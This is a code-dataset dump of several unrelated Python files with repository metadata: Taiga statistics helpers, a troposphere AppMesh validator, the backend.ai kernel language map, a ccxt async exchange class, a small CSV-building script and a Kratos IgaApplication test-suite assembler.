class assert_args:
    """
    Decorator factory that validates required arguments before calling.

    Usage: ``@assert_args("name", "tag")`` wraps a command handler taking a
    single ``args`` mapping.  If any required key is missing or maps to
    None, an error message is printed and 1 is returned without calling
    the handler.

    NOTE(review): on success the wrapper discards the handler's return
    value and returns None; callers relying on exit codes only ever see
    the 1 produced for a missing argument.  Confirm before changing.
    """
    def __init__(self, *args):
        # Names of the argument keys that must be present and non-None.
        self.needed_args = args
    def __call__(self, func):
        dec = self
        def wrapper(args):
            for arg in dec.needed_args:
                if arg not in args or args[arg] is None:
                    # Bug fix: message used to read "''{:s}'", printing a stray quote.
                    print("Required argument '{:s}' was not supplied on commandline or set in config file.".format(arg))
                    return 1
            func(args)
        return wrapper
| 25.79085 | 121 | 0.582615 | import datetime as dt
import sys
import matplotlib
import taiga_stats.constants as c
matplotlib.use("TkAgg")
DOT_HEADER_FMT = """digraph {:s} {{
labelloc="t";
//labelfontsize="40"
label="{:s}";
//size="7.5,10"
ratio="compress"
//orientation=landscape
"""
def get_tag_str(tag):
return "" if tag == c.TAG_MATCH_ALL else tag
def get_stories_with_tag(project, tag):
uss = project.list_user_stories()
ret_uss = None
if tag == c.TAG_MATCH_ALL:
ret_uss = uss
else:
ret_uss = []
for us in uss:
if us.tags and tag in us.tags:
ret_uss.append(us)
if ret_uss is None or len(ret_uss) == 0:
print(
"Warning: no userstories matching '{:s}' was found.".format(tag),
file=sys.stderr,
)
sys.exit(1)
return ret_uss
def get_us_stauts_id_from_name(project, name):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.name == name:
return status.id
return None
def get_us_status_name_from_id(project, status_id):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.id == status_id:
return status.name
return None
def remove_closed_stories(_project, uss):
ret_uss = []
for us in uss:
if not us.is_closed:
ret_uss.append(us)
return ret_uss
def get_statuses_sorted_by_order(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.order)
def get_statuses_sorted_by_id(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.id)
def get_status_id_sorted(project):
return [status.id for status in get_statuses_sorted_by_order(project)]
def get_status_and_names_sorted(project):
status_ids = get_status_id_sorted(project)[::-1]
status_names = []
for status_id in status_ids:
status_names.append(get_us_status_name_from_id(project, status_id))
return status_ids, status_names
def get_dot_header(name, title):
return DOT_HEADER_FMT.format(name, title)
def get_dot_footer():
return "}"
def read_daily_cfd(path, tag):
data_file = c.CFD_DATA_FILE_FMT.format(get_tag_str(tag))
data_path = "{:s}/{:s}".format(path, data_file)
data = []
try:
with open(data_path, "r", encoding="utf-8") as fdata:
row = 0
for line in fdata:
line = line.rstrip()
parts = line.split("\t")
if row == 0:
data = [[] for _ in range(len(parts) + 1)]
else:
for col in range(len(parts)):
value = parts[col]
if col == 0:
value = dt.datetime.strptime(value, "%Y-%m-%d")
elif col == 1:
pass
else:
value = int(value)
data[col].append(value)
row += 1
except IOError as e:
print(
"Could not read {:s}, error: {:s}".format(data_path, str(e)),
file=sys.stderr,
)
sys.exit(2)
return data
class assert_args:
def __init__(self, *args):
self.needed_args = args
def __call__(self, func):
dec = self
def wrapper(args):
for arg in dec.needed_args:
if arg not in args or args[arg] is None:
print("Required argument ''{:s}' was not supplied on commandline or set in config file.".format(arg))
return 1
func(args)
return wrapper
| true | true |
f72ebbd1000cb065fe77e17ce2acc68b098d41f3 | 522 | py | Python | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2012-2022, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
def validate_listenertls_mode(listenertls_mode):
    """
    Validate Mode for ListenerTls
    Property: ListenerTls.Mode

    Returns the value unchanged when it is one of the allowed modes;
    raises ValueError otherwise.
    """
    VALID_LISTENERTLS_MODE = ("STRICT", "PERMISSIVE", "DISABLED")
    if listenertls_mode not in VALID_LISTENERTLS_MODE:
        # Typo fix: the message previously read "ListernerTls".
        raise ValueError(
            "ListenerTls Mode must be one of: %s" % ", ".join(VALID_LISTENERTLS_MODE)
        )
    return listenertls_mode
| 26.1 | 86 | 0.685824 |
def validate_listenertls_mode(listenertls_mode):
VALID_LISTENERTLS_MODE = ("STRICT", "PERMISSIVE", "DISABLED")
if listenertls_mode not in VALID_LISTENERTLS_MODE:
raise ValueError(
"ListernerTls Mode must be one of: %s" % ", ".join(VALID_LISTENERTLS_MODE)
)
return listenertls_mode
| true | true |
f72ebc3e4aa53fcb0695239a45e7c14928a36718 | 1,159 | py | Python | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | 1 | 2021-10-04T21:59:34.000Z | 2021-10-04T21:59:34.000Z | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | null | null | null | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | null | null | null | import argparse
from .base import BaseRunner
from .terminal import Terminal
__all__ = (
'BaseRunner',
'Terminal',
)
__version__ = '1.4.1'
# Maps a supported language/runtime identifier to the dotted path of its
# Runner implementation.  Presumably resolved dynamically to a Runner class
# at kernel start-up -- confirm against the kernel entry point.
lang_map = {
    'python': 'ai.backend.kernel.python.Runner',
    'c': 'ai.backend.kernel.c.Runner',
    'cpp': 'ai.backend.kernel.cpp.Runner',
    'golang': 'ai.backend.kernel.golang.Runner',
    'rust': 'ai.backend.kernel.rust.Runner',
    'java': 'ai.backend.kernel.java.Runner',
    'haskell': 'ai.backend.kernel.haskell.Runner',
    'julia': 'ai.backend.kernel.julia.Runner',
    'lua': 'ai.backend.kernel.lua.Runner',
    'nodejs': 'ai.backend.kernel.nodejs.Runner',
    'octave': 'ai.backend.kernel.octave.Runner',
    'php': 'ai.backend.kernel.php.Runner',
    'r': 'ai.backend.kernel.r.Runner',
    'scheme': 'ai.backend.kernel.scheme.Runner',
    'git': 'ai.backend.kernel.git.Runner',
    'vendor.aws_polly': 'ai.backend.kernel.vendor.aws_polly.Runner',
}
def parse_args(args=None):
    """Parse the kernel-runner command line: a required ``lang`` (one of the
    keys of ``lang_map``) and an optional ``--debug`` flag.  With
    ``args=None``, argparse reads ``sys.argv`` as usual."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--debug', action='store_true', default=False)
    arg_parser.add_argument('lang', type=str, choices=lang_map.keys())
    return arg_parser.parse_args(args)
| 29.717949 | 70 | 0.672131 | import argparse
from .base import BaseRunner
from .terminal import Terminal
__all__ = (
'BaseRunner',
'Terminal',
)
__version__ = '1.4.1'
lang_map = {
'python': 'ai.backend.kernel.python.Runner',
'c': 'ai.backend.kernel.c.Runner',
'cpp': 'ai.backend.kernel.cpp.Runner',
'golang': 'ai.backend.kernel.golang.Runner',
'rust': 'ai.backend.kernel.rust.Runner',
'java': 'ai.backend.kernel.java.Runner',
'haskell': 'ai.backend.kernel.haskell.Runner',
'julia': 'ai.backend.kernel.julia.Runner',
'lua': 'ai.backend.kernel.lua.Runner',
'nodejs': 'ai.backend.kernel.nodejs.Runner',
'octave': 'ai.backend.kernel.octave.Runner',
'php': 'ai.backend.kernel.php.Runner',
'r': 'ai.backend.kernel.r.Runner',
'scheme': 'ai.backend.kernel.scheme.Runner',
'git': 'ai.backend.kernel.git.Runner',
'vendor.aws_polly': 'ai.backend.kernel.vendor.aws_polly.Runner',
}
def parse_args(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('--debug', action='store_true', default=False)
parser.add_argument('lang', type=str, choices=lang_map.keys())
return parser.parse_args(args)
| true | true |
f72ebcf7d866cdce598b76811f70a12537e4584c | 8,422 | py | Python | python/ccxt/async/base/exchange.py | skeller88/ccxt | 7200521a005a2ddc23efe7bd003628b8e8b955dd | [
"MIT"
] | null | null | null | python/ccxt/async/base/exchange.py | skeller88/ccxt | 7200521a005a2ddc23efe7bd003628b8e8b955dd | [
"MIT"
] | null | null | null | python/ccxt/async/base/exchange.py | skeller88/ccxt | 7200521a005a2ddc23efe7bd003628b8e8b955dd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
__version__ = '1.13.45'
# -----------------------------------------------------------------------------
import asyncio
import concurrent
import socket
import time
import math
import random
import certifi
import aiohttp
import ssl
import yarl
# -----------------------------------------------------------------------------
from ccxt.async.base.throttle import throttle
# -----------------------------------------------------------------------------
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import RequestTimeout
from ccxt.base.errors import NotSupported
# -----------------------------------------------------------------------------
from ccxt.base.exchange import Exchange as BaseExchange
# -----------------------------------------------------------------------------
__all__ = [
'BaseExchange',
'Exchange',
]
# -----------------------------------------------------------------------------
class Exchange(BaseExchange):
def __init__(self, config={}):
if 'asyncio_loop' in config:
self.asyncio_loop = config['asyncio_loop']
self.asyncio_loop = self.asyncio_loop or asyncio.get_event_loop()
self.own_session = 'session' not in config
if self.own_session:
# Create out SSL context object with our CA cert file
context = ssl.create_default_context(cafile=certifi.where())
# Pass this SSL context to aiohttp and create a TCPConnector
connector = aiohttp.TCPConnector(ssl_context=context, loop=self.asyncio_loop)
self.session = aiohttp.ClientSession(loop=self.asyncio_loop, connector=connector)
super(Exchange, self).__init__(config)
self.init_rest_rate_limiter()
def init_rest_rate_limiter(self):
self.throttle = throttle(self.extend({
'loop': self.asyncio_loop,
}, self.tokenBucket))
def __del__(self):
if self.session is not None:
self.logger.warning(self.id + ' requires to release all resources with an explicit call to the .close() coroutine.')
async def close(self):
if self.session is not None:
if self.own_session:
await self.session.close()
self.session = None
async def wait_for_token(self):
while self.rateLimitTokens <= 1:
# if self.verbose:
# print('Waiting for tokens: Exchange: {0}'.format(self.id))
self.add_new_tokens()
seconds_delays = [0.001, 0.005, 0.022, 0.106, 0.5]
delay = random.choice(seconds_delays)
await asyncio.sleep(delay)
self.rateLimitTokens -= 1
def add_new_tokens(self):
# if self.verbose:
# print('Adding new tokens: Exchange: {0}'.format(self.id))
now = time.monotonic()
time_since_update = now - self.rateLimitUpdateTime
new_tokens = math.floor((0.8 * 1000.0 * time_since_update) / self.rateLimit)
if new_tokens > 1:
self.rateLimitTokens = min(self.rateLimitTokens + new_tokens, self.rateLimitMaxTokens)
self.rateLimitUpdateTime = now
async def fetch2(self, path, api='public', method='GET', params={}, headers=None, body=None):
"""A better wrapper over request for deferred signing"""
if self.enableRateLimit:
await self.throttle()
self.lastRestRequestTimestamp = self.milliseconds()
request = self.sign(path, api, method, params, headers, body)
return await self.fetch(request['url'], request['method'], request['headers'], request['body'])
async def fetch(self, url, method='GET', headers=None, body=None):
"""Perform a HTTP request and return decoded JSON data"""
headers = self.prepare_request_headers(headers)
url = self.proxy + url
if self.verbose:
print("\nRequest:", method, url, headers, body)
self.logger.debug("%s %s, Request: %s %s", method, url, headers, body)
encoded_body = body.encode() if body else None
session_method = getattr(self.session, method.lower())
http_status_code = None
try:
async with session_method(yarl.URL(url, encoded=True),
data=encoded_body,
headers=headers,
timeout=(self.timeout / 1000),
proxy=self.aiohttp_proxy) as response:
http_status_code = response.status
text = await response.text()
self.last_http_response = text
self.last_response_headers = response.headers
self.handle_errors(http_status_code, text, url, method, self.last_response_headers, text)
self.handle_rest_errors(None, http_status_code, text, url, method)
if self.verbose:
print("\nResponse:", method, url, str(http_status_code), str(response.headers), self.last_http_response)
self.logger.debug("%s %s, Response: %s %s %s", method, url, response.status, response.headers, self.last_http_response)
except socket.gaierror as e:
self.raise_error(ExchangeNotAvailable, url, method, e, None)
except concurrent.futures._base.TimeoutError as e:
self.raise_error(RequestTimeout, method, url, e, None)
except aiohttp.client_exceptions.ClientConnectionError as e:
self.raise_error(ExchangeNotAvailable, url, method, e, None)
except aiohttp.client_exceptions.ClientError as e:
self.raise_error(ExchangeError, url, method, e, None)
self.handle_errors(http_status_code, text, url, method, self.last_response_headers, text)
return self.handle_rest_response(text, url, method, headers, body)
async def load_markets(self, reload=False):
if not reload:
if self.markets:
if not self.markets_by_id:
return self.set_markets(self.markets)
return self.markets
markets = await self.fetch_markets()
currencies = None
if self.has['fetchCurrencies']:
currencies = await self.fetch_currencies()
return self.set_markets(markets, currencies)
async def fetch_markets(self):
return self.markets
async def fetch_order_status(self, id, market=None):
order = await self.fetch_order(id)
return order['status']
async def fetch_partial_balance(self, part, params={}):
balance = await self.fetch_balance(params)
return balance[part]
async def fetch_l2_order_book(self, symbol, limit=None, params={}):
orderbook = await self.fetch_order_book(symbol, limit, params)
return self.extend(orderbook, {
'bids': self.sort_by(self.aggregate(orderbook['bids']), 0, True),
'asks': self.sort_by(self.aggregate(orderbook['asks']), 0),
})
async def perform_order_book_request(self, market, limit=None, params={}):
raise NotSupported(self.id + ' performOrderBookRequest not supported yet')
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
orderbook = await self.perform_order_book_request(market, limit, params)
return self.parse_order_book(orderbook, market, limit, params)
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if not self.has['fetchTrades']:
self.raise_error(NotSupported, details='fetch_ohlcv() not implemented yet')
await self.load_markets()
trades = await self.fetch_trades(symbol, since, limit, params)
return self.build_ohlcv(trades, timeframe, since, limit)
async def fetch_full_tickers(self, symbols=None, params={}):
tickers = await self.fetch_tickers(symbols, params)
return tickers
async def edit_order(self, id, symbol, *args):
if not self.enableRateLimit:
self.raise_error(ExchangeError, details='updateOrder() requires enableRateLimit = true')
await self.cancel_order(id, symbol)
return await self.create_order(symbol, *args)
| 41.082927 | 135 | 0.602114 |
__version__ = '1.13.45'
import asyncio
import concurrent
import socket
import time
import math
import random
import certifi
import aiohttp
import ssl
import yarl
from ccxt.async.base.throttle import throttle
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import RequestTimeout
from ccxt.base.errors import NotSupported
from ccxt.base.exchange import Exchange as BaseExchange
__all__ = [
'BaseExchange',
'Exchange',
]
class Exchange(BaseExchange):
def __init__(self, config={}):
if 'asyncio_loop' in config:
self.asyncio_loop = config['asyncio_loop']
self.asyncio_loop = self.asyncio_loop or asyncio.get_event_loop()
self.own_session = 'session' not in config
if self.own_session:
context = ssl.create_default_context(cafile=certifi.where())
connector = aiohttp.TCPConnector(ssl_context=context, loop=self.asyncio_loop)
self.session = aiohttp.ClientSession(loop=self.asyncio_loop, connector=connector)
super(Exchange, self).__init__(config)
self.init_rest_rate_limiter()
def init_rest_rate_limiter(self):
self.throttle = throttle(self.extend({
'loop': self.asyncio_loop,
}, self.tokenBucket))
def __del__(self):
if self.session is not None:
self.logger.warning(self.id + ' requires to release all resources with an explicit call to the .close() coroutine.')
async def close(self):
if self.session is not None:
if self.own_session:
await self.session.close()
self.session = None
async def wait_for_token(self):
while self.rateLimitTokens <= 1:
self.add_new_tokens()
seconds_delays = [0.001, 0.005, 0.022, 0.106, 0.5]
delay = random.choice(seconds_delays)
await asyncio.sleep(delay)
self.rateLimitTokens -= 1
def add_new_tokens(self):
now = time.monotonic()
time_since_update = now - self.rateLimitUpdateTime
new_tokens = math.floor((0.8 * 1000.0 * time_since_update) / self.rateLimit)
if new_tokens > 1:
self.rateLimitTokens = min(self.rateLimitTokens + new_tokens, self.rateLimitMaxTokens)
self.rateLimitUpdateTime = now
async def fetch2(self, path, api='public', method='GET', params={}, headers=None, body=None):
"""A better wrapper over request for deferred signing"""
if self.enableRateLimit:
await self.throttle()
self.lastRestRequestTimestamp = self.milliseconds()
request = self.sign(path, api, method, params, headers, body)
return await self.fetch(request['url'], request['method'], request['headers'], request['body'])
async def fetch(self, url, method='GET', headers=None, body=None):
"""Perform a HTTP request and return decoded JSON data"""
headers = self.prepare_request_headers(headers)
url = self.proxy + url
if self.verbose:
print("\nRequest:", method, url, headers, body)
self.logger.debug("%s %s, Request: %s %s", method, url, headers, body)
encoded_body = body.encode() if body else None
session_method = getattr(self.session, method.lower())
http_status_code = None
try:
async with session_method(yarl.URL(url, encoded=True),
data=encoded_body,
headers=headers,
timeout=(self.timeout / 1000),
proxy=self.aiohttp_proxy) as response:
http_status_code = response.status
text = await response.text()
self.last_http_response = text
self.last_response_headers = response.headers
self.handle_errors(http_status_code, text, url, method, self.last_response_headers, text)
self.handle_rest_errors(None, http_status_code, text, url, method)
if self.verbose:
print("\nResponse:", method, url, str(http_status_code), str(response.headers), self.last_http_response)
self.logger.debug("%s %s, Response: %s %s %s", method, url, response.status, response.headers, self.last_http_response)
except socket.gaierror as e:
self.raise_error(ExchangeNotAvailable, url, method, e, None)
except concurrent.futures._base.TimeoutError as e:
self.raise_error(RequestTimeout, method, url, e, None)
except aiohttp.client_exceptions.ClientConnectionError as e:
self.raise_error(ExchangeNotAvailable, url, method, e, None)
except aiohttp.client_exceptions.ClientError as e:
self.raise_error(ExchangeError, url, method, e, None)
self.handle_errors(http_status_code, text, url, method, self.last_response_headers, text)
return self.handle_rest_response(text, url, method, headers, body)
async def load_markets(self, reload=False):
if not reload:
if self.markets:
if not self.markets_by_id:
return self.set_markets(self.markets)
return self.markets
markets = await self.fetch_markets()
currencies = None
if self.has['fetchCurrencies']:
currencies = await self.fetch_currencies()
return self.set_markets(markets, currencies)
async def fetch_markets(self):
return self.markets
async def fetch_order_status(self, id, market=None):
order = await self.fetch_order(id)
return order['status']
async def fetch_partial_balance(self, part, params={}):
balance = await self.fetch_balance(params)
return balance[part]
async def fetch_l2_order_book(self, symbol, limit=None, params={}):
orderbook = await self.fetch_order_book(symbol, limit, params)
return self.extend(orderbook, {
'bids': self.sort_by(self.aggregate(orderbook['bids']), 0, True),
'asks': self.sort_by(self.aggregate(orderbook['asks']), 0),
})
async def perform_order_book_request(self, market, limit=None, params={}):
raise NotSupported(self.id + ' performOrderBookRequest not supported yet')
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
orderbook = await self.perform_order_book_request(market, limit, params)
return self.parse_order_book(orderbook, market, limit, params)
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if not self.has['fetchTrades']:
self.raise_error(NotSupported, details='fetch_ohlcv() not implemented yet')
await self.load_markets()
trades = await self.fetch_trades(symbol, since, limit, params)
return self.build_ohlcv(trades, timeframe, since, limit)
async def fetch_full_tickers(self, symbols=None, params={}):
tickers = await self.fetch_tickers(symbols, params)
return tickers
async def edit_order(self, id, symbol, *args):
if not self.enableRateLimit:
self.raise_error(ExchangeError, details='updateOrder() requires enableRateLimit = true')
await self.cancel_order(id, symbol)
return await self.create_order(symbol, *args)
| false | true |
f72ebdd68a8fe652c399e7e2317e2c40df3f83a1 | 840 | py | Python | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | import urllib.request
from bs4 import BeautifulSoup
from time import sleep
import json
import hashlib
import os
from PIL import Image
import glob
files = glob.glob("tmp/*.json")
rows = []
rows.append(["ID", "Original", "Thubmnail", "Width", "Height"])
for file in sorted(files):
filename = file.split("/")[-1]
tmp = filename.replace(".json", "").split("_")
page = int(tmp[1])
if page >= 1:
print(filename)
# jsonファイルを読み込む
f = open(file)
# jsonデータを読み込んだファイルオブジェクトからPythonデータを作成
data = json.load(f)
# ファイルを閉じる
f.close()
rows.append([tmp[0], data["original"], data["thumbnail"], data["width"], data["height"]])
import csv
f = open('data/media.csv', 'w')
writer = csv.writer(f, lineterminator='\n')
writer.writerows(rows)
f.close()
| 17.87234 | 97 | 0.608333 | import urllib.request
from bs4 import BeautifulSoup
from time import sleep
import json
import hashlib
import os
from PIL import Image
import glob
files = glob.glob("tmp/*.json")
rows = []
rows.append(["ID", "Original", "Thubmnail", "Width", "Height"])
for file in sorted(files):
filename = file.split("/")[-1]
tmp = filename.replace(".json", "").split("_")
page = int(tmp[1])
if page >= 1:
print(filename)
f = open(file)
data = json.load(f)
f.close()
rows.append([tmp[0], data["original"], data["thumbnail"], data["width"], data["height"]])
import csv
f = open('data/media.csv', 'w')
writer = csv.writer(f, lineterminator='\n')
writer.writerows(rows)
f.close()
| true | true |
f72ebe8dc117d55ab1f3ff02c98054a97ce7d90a | 5,820 | py | Python | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 778 | 2017-01-27T16:29:17.000Z | 2022-03-30T03:01:51.000Z | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 6,634 | 2017-01-15T22:56:13.000Z | 2022-03-31T15:03:36.000Z | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 224 | 2017-02-07T14:12:49.000Z | 2022-03-06T23:09:34.000Z | # import Kratos
from KratosMultiphysics import *
from KratosMultiphysics.IgaApplication import *
import run_cpp_unit_tests
import KratosMultiphysics.kratos_utilities as kratos_utilities
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import Iga test factory tests
from iga_test_factory import SinglePatchTest as SinglePatchTest
# Truss tests - python based
from truss_element_tests import TrussElementTests as TTrussElementTests
# Membrane tests
from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic
# 3p Shell KL - python based
from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests
# 3p Shell KL
from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest
from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest
# 5p Shell Hierarchic
from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest
from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest
from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest
# 5p Shell
from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest
# Weak support tests
from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest
from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest
from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest
# Coupling/C_0 tests
from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest
from iga_test_factory import TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest
from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest
from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest
# Rotation/G_1 coupling tests
from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest
from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest
# Nurbs Volume tests
from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements
# Modelers tests
from test_modelers import TestModelers as TTestModelers
has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication")
def AssembleTestSuites():
    ''' Populates the test suites to run.
    Populates the test suites to run. At least, it should populate the suites:
    "small", "nightly" and "all"
    Return
    ------
    suites: A dictionary of suites
        The set of suites with its test_cases added.
    '''
    suites = KratosUnittest.KratosSuites
    smallSuite = suites['small']
    smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
        # Single patch test - checks iga essentials
        SinglePatchTest,
        # Truss tests
        TTrussElementTests,
        # Membrane tests
        MembraneSinglePatchFourPointSailLinearStatic,
        MembraneSinglePatchFourPointSailNonLinearStatic,
        # 3p Shell KL
        TShell3pElementTests,
        ScordelisRoofShell3pTest,
        LinearBeamShell3pTest,
        # 5p Shell Director
        ScordelisRoofShell5pTest,
        # Weak support tests
        SinglePatchRefinedSupportPenaltyTest,
        SinglePatchRefinedSupportLagrangeTest,
        # Coupling tests
        TwoPatchCouplingPenaltyShell3pTest,
        TwoPatchCouplingLagrangeShell3pTest,
        TwoPatchRefinedCouplingPenaltyMembraneTest,
        TwoPatchRefinedCouplingLagrangeMembraneTest,
        # Rotation/G_1 coupling tests
        TwoPatchCantileverCouplingPenaltyTest,
        TwoPatchCantileverRefinedCouplingPenaltyTest,
        # Volumes
        TTestNurbsVolumeElements,
        # Modelers
        TTestModelers
    ]))
    # Nitsche-based tests require the FEAST eigensolver from LinearSolversApplication.
    if has_linear_solvers_application:
        from KratosMultiphysics import LinearSolversApplication
        if LinearSolversApplication.HasFEAST():
            smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
                # Weak support Nitsche test
                SinglePatchRefinedSupportNitscheTest,
                # Coupling Nitsche tests
                TwoPatchCouplingNitscheShell3pTest,
                TwoPatchRefinedCouplingNitscheMembraneTest
            ]))
        else:
            print("FEAST not available in LinearSolversApplication")
    # The nightly suite is a superset of the small suite.
    nightSuite = suites['nightly']
    nightSuite.addTests(smallSuite)
    nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
        # Membrane tests
        MembraneSinglePatchFourPointSailImplicitDynamic,
        # 5p Shell Hierarchic
        TShell5pHierarchicLinearThickBeamTest,
        TShell5pHierarchicLinearScordelisTest,
        TShell5pHierarchicNonLinearThickBeamTest
    ]))
    allSuite = suites['all']
    allSuite.addTests(nightSuite)
    return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
| 46.56 | 127 | 0.813746 |
from KratosMultiphysics import *
from KratosMultiphysics.IgaApplication import *
import run_cpp_unit_tests
import KratosMultiphysics.kratos_utilities as kratos_utilities
import KratosMultiphysics.KratosUnittest as KratosUnittest
from iga_test_factory import SinglePatchTest as SinglePatchTest
from truss_element_tests import TrussElementTests as TTrussElementTests
from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic
from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests
from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest
from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest
from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest
from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest
from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest
from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest
from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest
from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest
from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest
from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest
from iga_test_factory import TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest
from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest
from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest
from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest
from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest
from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements
from test_modelers import TestModelers as TTestModelers
